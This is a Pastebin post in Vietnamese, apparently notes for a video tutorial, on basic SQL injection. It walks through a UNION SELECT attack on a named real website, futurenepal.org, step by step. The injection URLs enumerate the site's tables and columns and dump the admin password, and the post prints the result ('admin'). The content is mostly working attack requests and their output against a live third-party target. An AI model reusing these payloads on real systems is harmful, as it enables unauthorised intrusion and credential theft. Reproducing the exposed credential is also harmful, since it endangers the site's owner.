Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- - JKD xin hướng dẫn các bạn khai thác lỗ hỗng SQL cơ bản
- Victim : http://www.futurenepal.org/newsdetails.php?activityid=11
- - Bước 1 : Tìm lỗi
- + Mã : http://www.futurenepal.org/newsdetails.php?activityid=11'
- Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/futurene/public_html/newsdetails.php on line 11 ! Lỗi nhé !!!
- - Bước 2 : Tìm số trường cột
- + Mã : order by 1-- -
- Cột 1 : ko lỗi
- Cột 3 : ko lỗi >> chúng ta chọn cột thứ 3 nhé !!!
- Cột 4 : lỗi
- Cột 10 : lỗi
- - Bước 3 : Xác định vị trí trường cột bị lỗi (Chúng ta dùng union select nhé !!) khi chúng ta ko thấy cái số cột lỗi thì ta thêm - trước số 11
- + Mã : http://www.futurenepal.org/newsdetails.php?activityid=-11 UNION SELECT 1,2,3-- -
- 2 vs 3
- - Bước 4 : Tìm tables
- + Mã : http://www.futurenepal.org/newsdetails.php?activityid=-11 UNION SELECT 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- -
- tbactivity,tbadminpwd,tbcontents,tbhitcounter,tbmails,tbphotos,tbsetting,tbslidephotos
- ở table này chứa user + pass là tbadminpwd nhé !!! JKD sai chỗ nào nhỉ =))
- - Bước 5 : Xuất column trong table chứa user + pass
- + Mã : http://www.futurenepal.org/newsdetails.php?activityid=-11 UNION SELECT 1,group_concat(column_name),3 from information_schema.columns where table_name=0x746261646d696e707764-- -
- Site này theo kinh nghiệm JKD thì đã bị phá rồi !! nên chỉ còn Password or ... !!! và video này chủ yếu là dạy các bạn cơ bản hoy !! ko có ý đồ phá hoại ... nên JKD sẽ tiếp tục nhé !!
- - Bước 6 : Xuất user + pass
- + Mã : http://www.futurenepal.org/newsdetails.php?activityid=-11 UNION SELECT 1,group_concat(Password),3 from tbadminpwd-- -
- và pass là : admin
- - Lưu ý : video này chủ yếu dạy các bạn khai thác hoy ! ko có ý phá hoại !! và ở video có nhiều chỗ sơ xài !! có gì ko hĩu các bạn có thể ib page hỏi !!!
- - và Dụng cụ quan trọng là : hackbar nhé !! để encoding nhé !!!
- Blog : jkd-jacker.blogspot.com
- Page : fb.com/jkd.hack/ !!!
- Thank You For watching !!! Hello And Say Goodbye <3
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement